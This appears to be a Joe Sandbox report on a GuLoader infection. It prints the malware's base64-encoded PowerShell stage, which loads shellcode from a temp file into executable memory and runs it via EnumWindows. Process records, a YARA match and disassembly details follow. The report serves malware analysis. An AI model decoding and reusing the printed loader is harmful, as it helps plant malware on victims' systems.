ACAAVABVAFAARQBLAFMATwBNAE4AIABkAGUAbQBlAG4AdAAgAFQAbQByAGUAcwAgAEEAbgB0AGUAbQBhAHIAZwA1ACAAQQB2AG8AdwBlAGkAbgBkADkAIABwAHIAaQBiACAASABFAEwASQBOAEcAIAANAAoAIwBTAEkARABFAE8AUgBEAE4AIABHAGEAbAB2AGEAbgBvAHAAIABTAHkAZgBpAGwAOAAgAGMAeQBkAGkAcABwAGkAIABTAGgAYQBtAGEAbgAgAEcAdQBhAG4AcwAgAFMAbABhAHAAcABlAHIAMQAgAEUAbgBzAHUAIABTAHQAdQBkAHkAcwBmAHUAIABjAGUAYwBpACAAQQBmAHQAZQBuADcAIABzAGwAYQBwAHAAZQBsACAAVABSAEkAVABPAE4ARQAgAE0AdQBzAGkAYwBsAGkANQAgAEgAZQByAHQAdQBnAGQAbQBtAGUAIABmAG8AcgBtAGEAbgBlAG4AZAAgAGIAcgBhAGkAbABsAGUAcwBkAGkAIABIAE8ATQBFAEwASQAgAFAATABFAEEAIABwAHUAcgBpAGYAaQBjAGEAdAAgAEYAQQBMAEIAWQBEAEUATABTAEUAIAANAAoAIwBJAE4AVABSACAARwByAGEAdgBsAHMAdgBhAHIAbQAgAG0AdQBzAGkAawBoAGEAIABDAGgAYQBpAHIAbQA0ACAARgByAGkAYgBvAHMAcwBhADUAIABUAGkAbABzAG0AdQBkADUAIABkAHkAcwBmAHUAbgAgAGsAaABhAHIAbwAgAFYAZQByAGQAIABTAFUAUABFAFIAIABJAG4AYQBwAHAAZQB0ACAAQwBPAE8ATABOAEUAUwBTAEUAUwAgAEIAYQBnAHYAIABGAGwAbwByAGkAZgAgAEEAcgBjAGkAZgBvACAAUAB0AHkAYQBsADQAIABQAGEAZABzAGEAIABTAGsAYQBhAGwAMwAgAEQAVQBMAEwAWQBIAEoATABQACAAUwBtAGkAdABzADIAIABGAGwAeQB2AGUAIABUAHIAbwBsAGQAZABvAG0AcwA5ACAAdQBmAG8AcgB1ACAAdQBuAHYAbwAgAEQAUgBBAEcATgAgAGYAYQBuAHQAYQBzAGkAbAAgAA0ACgAjAEYAcgB5AGcAdABlAGcAbwBvAGQAIABNAGEAZwBuAGUAIABTAHQAeQByAGUAZgBqAGUAcgBlACAAVABpAG4AZgB1ACAAcABpAG4AZgAgAG4AZAB0AHYAdQBuACAAUwBlAGsAcwB1AGEAIABUAGkAbABzAHQAbgBpADcAIABWAHIAZABpAHAAYQA4ACAAVQBuAGYAYQB2AG8AcgA5ACAAUwB0AGEAbAA2ACAAdABvAHAAYwBvAGEAdABpAG4AIABHAE8ARABLACAATgBhAGcAcwBtAGEAbgAgAEwAVQBUAEkAUwBUAFMAVQBEAEUAIABCAEUATABMAEEARAAgAFAAYQBsAHQAIABPAHAAcwB0ACAAQwBJAFIAQwBVACAASwBsAGEAbQByAGUAIABhAGYAZwByAGYAdABlACAARgByAGUAbQBrAGEAbABkAGUAIAANAAoAIwBhAG4AYQBsAHkAcwBlAG0AIABGAHIAeQBkAGUAZgB1AGwAMQAgAFQAdQBiAGUAcgAgAEsAdQBzAGkAbgBlACAARAB5AGsAawBlACAARQBtAHAAYQB0AGkAcwBrAGsAbwAgAEYAcgBkAGkAZwBnAHIANAAgAE8AcgBnAGEAbgBpAHMAMQAgAFAAYQBsAG0AYQB0AGkAIABNAEUARABEAEUATABNAEEAIABNAGUAbgBzAHUAcgBhAHQAaQBvADgAIAB0AGEAYgBlAHIAcwByACAARgBJAFIATQBJAE4AVABFAFIAQQAgAEEAZgBsAGEAZABzAGsAcgBtAG0AIABCAGEAawBsAHkAZwB0AGUAcgBuADkAIABQAEUAQQBTAEEATgBUACAAdABpAGwAZwAgAFMAdABhAHIAZQBkADYAIABCAG8AcgB0AHMAbABnAGUAbgAgAFMAVgBFAEwAVABFAFMASwBFAEwAIABDAGkAbABpAGkAdQBtAHAAbwBsADEAIABCAEUAVgBJAEQAUwBUAEcAUgBHACAAZABkAG4AaQBuAGcAIABHAEEATQBFAFMAVABSAEUAUwBTACAAcABsAGoAbgBpAG4AZwAgAFMAcABvAG4AZABpAHMAawBlADgAIABOAGkAZABvACAAawByAGEAawBpAGwAZQByAG4AIABBAGYAcwBlAHIAaQBsAGwANAAgAA0ACgAjAFUAbgBkAGUAcgBsAGUAdgBlACAAQQBtAHkAbwBzAHQAaABlADgAIABPAHIAawBuAGUAeQAgAHMAdAB1AGQAcwBuAGkAbgBnAGUAIABzAGUAcgBhAHUAYgAgAEQAQQBOAE4ARQBCAFIATwBHACAAUwB2AHIAZABsAGkAIABUAHIAaQBvAHAAcwBzAGsAYQB0ADIAIABSAE8AVABUAEUARgBMAEQARQBSACAASwB2AGEAcgB0ACAAcwBoAGEAdwBsAGwAaQBrAGUAbQAgAGQAYQBhAHMAIABLAEEAUwBUAE4ASQBOAEcARQAgAEYAZQBlAGQAZQAyACAAZQBtAGIAZQBkAHMAZQBrAHMAIABWAGUAbABnAHIAZQByACAAQwBvAGcAaQB0AGEAIABQAGEAaABhACAAYgByAG4AZABzACAAVABSAFkASwBNAEEAIABTAHkAbgBsADkAIABDAGwAaQB0AG8AcgBvAG0AOQAgAEEAbgBuAHUAbgA4ACAAVQBOAEkAUgAgAFUATgBXAEUAIABPAHAAaQBuAGkAIABVAGQAYQBkAHYAZQAgAGkAbgBkAGkAYQBuACAAUgBVAEIATgAgAEEAbABpAGcAaAB0ACAAUwB0AHYAbABlAHQAdABlACAADQAKACMAYQBsAGwAbwBwAGEAIABTAGUAcwBhACAAQQBuAGkAbQBhAGwAIABJAE0ATQBJAEcAUgBBACAAUwBwAHIAagB0AGUAbgAgAE4AbwBvAGQAbABpAG4AZwAgAEwAYQBjAHEAdQBlAHIANAAgAEIAQgBDAE0AVQBUAFQARQAgAGEAYgB1AHoAIABBAGwAZwBlAHYAawBzACAAQwBoAGEAcgBtAGUAdAByADEAIABUAGgAZQBuAGMAZQBmAG8AcgAyACAAVABpAG4AcwBlAGwAcgAxACAAUwBsAHYAcwBuAG8AcgBlACAAdQBuAHMAYQB3ACAASABVAEwAVwBPACAAaABqAHQAcwBpAGQAIABhAGYAcwBsACAADQAKACMAUgBPAFMARQBPACAARgBBAEIAUgBJAEsARQBSACAAUABFAE4AVAAgAFMAbABhAGcAIABxAHUAYQB2AGUAcgBlAGQAZABlACAAdAByAGUAZABvAGIAbAAgAGMAZQBuAG8AZwBlAG4AIABVAEgASgBMAFAAUwAgAGIAZQBnAHIAbABpACAAUABSAE8AQgBMAEUATQAgAFQAaABlAHIAYQBwAHMAaQBkADQAIABUAHIAbgByAG0AaQBjAHIAbwBwACAAVQBuAGEAcgA3ACAAUABSAEUASgBVACAASAB2AGkAbABlAGQAYQBnAGUAbgAgAEwAeQBnAHQAZQBwAGwAdwBoAGkANQAgAEwAYQB2AGkAcwBoAGUAcwAxACAAYgBvAG8AawBzAGUAbABsAGkAbgAgAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFAAUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA==
      Imagebase:0xfc0000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      General

      Target ID:20
      Start time:13:32:59
      Start date:12/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:24
      Start time:13:33:31
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
      Imagebase:0x200000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      General

      Target ID:25
      Start time:13:33:36
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
      Imagebase:0x800000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Disassembly

      Reset < >

        Execution Graph

        Execution Coverage:5%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:17.6%
        Total number of Nodes:17
        Total number of Limit Nodes:1
        execution_graph 16189 77135e8 16190 77135fb 16189->16190 16193 7713400 16190->16193 16194 7713423 16193->16194 16195 7713463 16194->16195 16197 77133a8 16194->16197 16198 77133bc 16197->16198 16201 77130a8 16198->16201 16199 77133e9 16199->16195 16202 77130c1 16201->16202 16203 771312a 16202->16203 16206 7712b78 16202->16206 16203->16199 16208 7712ca8 16206->16208 16209 7712b9e 16206->16209 16208->16199 16209->16208 16210 7711a68 16209->16210 16211 7715d78 CreateNamedPipeW 16210->16211 16213 7715eaa 16211->16213

        Executed Functions

        Function 07711A68 Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 145 7711a68-7715de2 148 7715de4-7715dea 145->148 149 7715ded-7715df6 145->149 148->149 150 7715e15-7715e19 149->150 151 7715df8-7715e14 149->151 152 7715e1b-7715e32 150->152 153 7715e3a-7715ea8 CreateNamedPipeW 150->153 151->150 152->153 155 7715eb1-7715eef 153->155 156 7715eaa-7715eb0 153->156 160 7715ef1-7715ef5 155->160 161 7715f04-7715f08 155->161 156->155 160->161 162 7715ef7-7715efa 160->162 163 7715f19 161->163 164 7715f0a-7715f16 161->164 162->161 164->163
        APIs
        • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 07715E98
        Memory Dump Source
        • Source File: 00000012.00000002.802808254.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_7710000_powershell.jbxd
        Similarity
        • API ID: CreateNamedPipe
        • String ID:
        • API String ID: 2489174969-0
        • Opcode ID: f5d2a2c654fc26d52111fdc56b28f4c2ea6926150782fb96827372ef46d45d35
        • Instruction ID: 0196478eb1c8df2859a504ede0e18112a28e831c810b2339c09069859a951a45
        • Opcode Fuzzy Hash: f5d2a2c654fc26d52111fdc56b28f4c2ea6926150782fb96827372ef46d45d35
        • Instruction Fuzzy Hash: 7B51F5B0D01348EFDB14CFA9C984B9EFBF2AF88344F25852AE418AB260D7749955CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07711CA0 Relevance: .6, Instructions: 634COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 229 7711ca0-7711e8b 249 7711e92-77120ab 229->249 276 77120b1-77120c1 249->276 277 7712280-771244f 249->277 280 77120c3-77120cd 276->280 281 77120cf 276->281 318 7712455-771254a 277->318 319 771254f-7712566 277->319 283 77120d4-77120d6 280->283 281->283 285 77120e0-77120ee 283->285 286 77120d8-77120de 283->286 287 77120f0-771227f 285->287 286->287 341 77126a3-77126bb 318->341 326 7712576-7712584 319->326 327 7712568-7712574 319->327 329 771258a-771269b 326->329 327->329 329->341 342 77126c2-77126f5 341->342 343 77126bd 341->343 348 7712702 342->348 349 77126f7 342->349 343->342 349->348
        Memory Dump Source
        • Source File: 00000012.00000002.802808254.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_7710000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6611a7b91de85866fdb64758c5ff761380e5110564e03cdd9c53b8fb54dbc39b
        • Instruction ID: 85b3d8b71ca15b7ecc704962a3e270e899bb34afcf3f1a4ac7dbaff270486954
        • Opcode Fuzzy Hash: 6611a7b91de85866fdb64758c5ff761380e5110564e03cdd9c53b8fb54dbc39b
        • Instruction Fuzzy Hash: 49429030A00619DFDB24DB64CC51BADB776EF89300F1185AAE50A7B391DF75AD81CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00FAA070 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 166 faa070-faa071 167 faa073-faa079 166->167 168 faa007-faa00e 166->168 169 faa07b-faa0b7 167->169 170 faa00f-faa012 167->170 168->170 173 faa01a-faa045 GetFileAttributesW 170->173 174 faa014-faa017 170->174 175 faa04e-faa06b 173->175 176 faa047-faa04d 173->176 174->173 176->175
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 00FAA038
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 2e81bd46e8cc168fd29ec37fee4e7b8377990408e9992a7babd9ea2363543fc9
        • Instruction ID: aa89c46484094f0c9b99538bfbd5d89c4defbe95a7e062aefec6590cc5e2b513
        • Opcode Fuzzy Hash: 2e81bd46e8cc168fd29ec37fee4e7b8377990408e9992a7babd9ea2363543fc9
        • Instruction Fuzzy Hash: E111AFB18042159FCB54CF59D840A8ABBB0FF45318F15CA5AE048EB265D375DD0ACBE1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00FA9FC0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
